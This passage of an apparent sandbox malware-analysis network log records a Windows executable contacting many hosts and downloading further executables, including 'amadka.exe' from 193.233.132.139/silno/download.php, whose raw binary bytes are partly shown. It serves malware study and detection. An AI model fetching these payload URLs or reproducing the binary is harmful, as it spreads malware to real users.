Mar 28, 2024 09:14:58.696168900 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49741	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.489371061 CET	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 05 27 01 2a c4 b6 4a 9f 3e 91 11 b0 10 ca 18 4e 74 63 cc 95 55 ee 09 34 b1 7a f0 9d a2 f7 4c 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'*J>NtcU4zL&,+0/$#('=<5/Lvk.com#
Mar 28, 2024 09:14:58.700164080 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49747	18.205.93.0	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.570158005 CET	117	OUT	Data Raw: 16 03 01 00 70 01 00 00 6c 03 01 66 05 27 01 0a 77 53 ce 6d 93 fe 53 d1 e6 ca b9 39 36 78 d8 44 88 ea f7 96 0d 20 a6 33 82 a8 c1 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 35 00 00 00 12 00 10 00 00 0d 62 69 74 62 75 63 6b 65 74 Data Ascii: plf'wSmS96xD 35/5bitbucket.org#
Mar 28, 2024 09:14:58.664935112 CET	89	IN	HTTP/1.0 400 Bad request Content-Type: text/html Data Raw: 3c 68 32 3e 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 20 62 61 64 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a Data Ascii: <h2>Client sent a bad request.</h2>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49748	104.21.36.53	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.582138062 CET	120	OUT	Data Raw: 16 03 01 00 73 01 00 00 6f 03 01 66 05 27 01 84 40 50 41 5d 96 b4 db e1 35 be 60 e4 01 af f1 6f 61 87 cb a5 a1 ff 82 61 62 e0 39 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 38 00 00 00 15 00 13 00 00 10 63 79 62 65 72 76 69 6e 63 Data Ascii: sof'@PA]5`oaab95/8cybervincent.com#
Mar 28, 2024 09:14:58.677176952 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49749	172.67.180.119	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.582164049 CET	120	OUT	Data Raw: 16 03 01 00 73 01 00 00 6f 03 01 66 05 27 01 e4 54 e8 88 8a 63 57 8c 8c 41 34 15 cb 81 bf 6f 5e be 4b df b1 88 9b 9f 45 45 6b f8 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 38 00 00 00 15 00 13 00 00 10 74 72 69 65 64 63 68 69 63 Data Ascii: sof'TcWA4o^KEEk5/8triedchicken.net#
Mar 28, 2024 09:14:58.677223921 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49750	45.130.41.108	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.828104019 CET	173	OUT	Data Raw: 16 03 03 00 a8 01 00 00 a4 03 03 66 05 27 02 47 a0 25 26 8b 90 aa bb 2a 4e 4f 5c 97 b2 70 3d cc 42 6e 99 e2 f1 c3 42 e2 51 94 e3 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'G%&*NO\p=BnBQ&,+0/$#('=<5/Umonoblocked.com#
Mar 28, 2024 09:14:59.059216976 CET	329	IN	HTTP/1.1 400 Bad Request Server: nginx-reuseport/1.21.1 Date: Thu, 28 Mar 2024 08:14:58 GMT Content-Type: text/html Content-Length: 167 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 65 75 73 65 70 6f 72 74 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx-reuseport/1.21.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49751	176.113.115.135	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.838248014 CET	195	OUT	GET /gyhu HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 176.113.115.135 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49756	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.911809921 CET	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 05 27 02 7c 7c ab 0b db 3f 7b aa 88 ea e4 32 c3 53 b8 b8 d3 66 26 8d 93 4e 81 ec 5b 0b 02 71 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'\|\|?{2Sf&N[q&,+0/$#('=<5/Lvk.com#
Mar 28, 2024 09:14:59.125418901 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49757	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.921192884 CET	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 05 27 02 1b cd 56 4b cb 7d dd c9 e4 95 03 be a7 67 ab eb 93 03 54 18 93 d0 b9 e2 9d 2c 39 53 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'VK}gT,9S&,+0/$#('=<5/Lvk.com#
Mar 28, 2024 09:14:59.134553909 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49755	130.164.189.20	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:58.943788052 CET	202	OUT	HEAD /share/index.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: ngovpn.com Cache-Control: no-cache
Mar 28, 2024 09:14:59.466528893 CET	324	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: application/octet-stream Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=73ee8fa4.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49762	45.130.41.108	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:59.289427996 CET	119	OUT	Data Raw: 16 03 01 00 72 01 00 00 6e 03 01 66 05 27 02 ed 6c e1 42 72 a4 c4 11 8a e2 fe 2c f6 32 f5 75 60 a4 b8 0b 9c 72 0d df 38 bd 3b 4e 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 37 00 00 00 14 00 12 00 00 0f 6d 6f 6e 6f 62 6c 6f 63 6b Data Ascii: rnf'lBr,2u`r8;N5/7monoblocked.com#
Mar 28, 2024 09:14:59.518958092 CET	329	IN	HTTP/1.1 400 Bad Request Server: nginx-reuseport/1.21.1 Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html Content-Length: 167 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 65 75 73 65 70 6f 72 74 2f 31 2e 32 31 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx-reuseport/1.21.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49763	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:59.365828991 CET	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 05 27 02 65 e8 58 97 a6 9c 94 d9 d2 8a c8 8b 3b 16 66 42 a4 35 6f 65 5f 25 44 c5 c2 45 71 7f 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'eX;fB5oe_%DEq&,+0/$#('=<5/Lvk.com#
Mar 28, 2024 09:14:59.581518888 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49764	93.186.225.194	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:59.366543055 CET	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 05 27 02 c7 59 17 02 d1 61 2a 54 fb 38 85 9e 63 7e 25 0c d0 cb d5 9c 0c 75 9f f4 ee bd 0f 39 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: f'Ya*T8c~%u9&,+0/$#('=<5/Lvk.com#
Mar 28, 2024 09:14:59.577986002 CET	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49739	193.233.132.139	80	6984	C:\Users\user\Desktop\i1crvbOZAP.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:14:59.401120901 CET	210	OUT	HEAD /silno/download.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 193.233.132.139 Cache-Control: no-cache
Mar 28, 2024 09:14:59.631917953 CET	232	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: application/octet-stream Content-Length: 1963008 Connection: keep-alive Content-Disposition: attachment; filename="amadka.exe"
Mar 28, 2024 09:14:59.731618881 CET	209	OUT	GET /silno/download.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 193.233.132.139 Cache-Control: no-cache
Mar 28, 2024 09:14:59.963074923 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 28, 2024 09:14:59.963141918 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:14:59 GMT Content-Type: application/octet-stream Content-Length: 1963008 Connection: keep-alive Content-Disposition: attachment; filename="amadka.exe" Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 64 a0 59 40 05 ce 0a 40 05 ce 0a 40 05 ce 0a 1b 6d cd 0b 51 05 ce 0a 1b 6d cb 0b e0 05 ce 0a 95 68 ca 0b 52 05 ce 0a 95 68 cd 0b 57 05 ce 0a 95 68 cb 0b 35 05 ce 0a 1b 6d ca 0b 55 05 ce 0a 1b 6d cf 0b 53 05 ce 0a 40 05 cf 0a 94 05 ce 0a db 6b c7 0b 41 05 ce 0a db 6b 31 0a 41 05 ce 0a db 6b cc 0b 41 05 ce 0a 52 69 63 68 40 05 ce 0a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6f 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 06 05 00 00 b6 01 00 00 00 00 00 00 b0 4d 00 00 10 00 00 00 20 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4d 00 00 04 00 00 be da 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 a0 06 00 6a 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 9b 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 9b 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 ea 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2c 00 00 b0 06 00 00 02 00 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6f 6d 69 6a 6f 75 65 00 d0 1a 00 00 d0 32 00 00 ce 1a 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 70 7a 75 64 70 77 70 00 10 00 00 00 a0 4d 00 00 04 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4d 00 00 22 00 00 00 d2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$dY@@@mQmhRhWh5mUmS@kAk1AkARich@PELoeM @M@VjMlM @.rsrc@.idata @ ,@iomijoue2@cpzudpwpM@.taggant0M"@
Mar 28, 2024 09:14:59.963160038 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 28, 2024 09:14:59.963167906 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Mar 28, 2024 09:14:59.963181019 CET	1286	IN	Data Raw: e6 9a 40 68 b4 1a 20 98 39 6b 24 81 bb 62 42 da ba 82 d0 b0 b2 eb 42 a8 92 06 f2 5f b2 da 1e a8 1e 07 de c1 e8 1a 33 b1 4a 63 85 f4 22 1b cb ba 4a 36 2e 6a 1b 7b 6a 60 5f ca aa 16 aa 1c ea b1 da 1f 41 bf 36 fb 42 81 92 3b 6e 48 be 62 5a 64 ee b1 Data Ascii: @h 9k$bBB_3Jc"J6.j{j`_A6B;nHbZd^ip(42q{B@1`qp{h{{u8r]JZz/jb%=2{ov@Kb2r!B s$AN&([/'023$0{nz.b!2cb>?{6K
Mar 28, 2024 09:14:59.963229895 CET	1286	IN	Data Raw: ca dc cf 51 d2 e6 17 a0 74 7e 52 14 36 a1 19 ac a0 a4 68 17 12 b8 59 37 e5 66 11 57 32 96 14 46 22 ce 32 6b df e0 08 c3 89 8c 79 32 59 89 fc 6a e4 2d e9 b7 9b a1 e4 0e 8a 90 99 09 39 1e c2 5c e7 69 12 57 da 3f 76 70 da 6c b3 47 a1 e3 ca d4 d7 98 Data Ascii: Qt~R6hY7fW2F"2ky2Yj-9\iW?vplGDhglbC${~< .:,k<2O38jKR'i"C`A^22F7fLj2R/H.e*P\|90Kaj>#"
Mar 28, 2024 09:14:59.963238001 CET	1286	IN	Data Raw: fc ba aa ac 7b 4a 7e 59 37 0b 0a 50 08 0d 66 b0 11 04 e5 e3 f1 0a 0e 86 83 b8 c2 80 16 fc 7a 94 3a 71 f3 d5 c9 29 64 1a 41 b7 ce 00 90 11 29 fc 25 ac 93 49 fc 0b 7b 29 a9 e5 a6 a2 07 15 8c 63 19 a6 bd 6e 2f 6d e2 23 48 16 12 50 42 2c 5e 6e f8 e5 Data Ascii: {J~Y7Pfz:q)dA)%I{)cn/m#HPB,^nqCY\+)E?: FEY mA4aHO?yW{.)U]$zE1zDC~]f"D2p#siz!n6O'>acT+"+94m'H"c
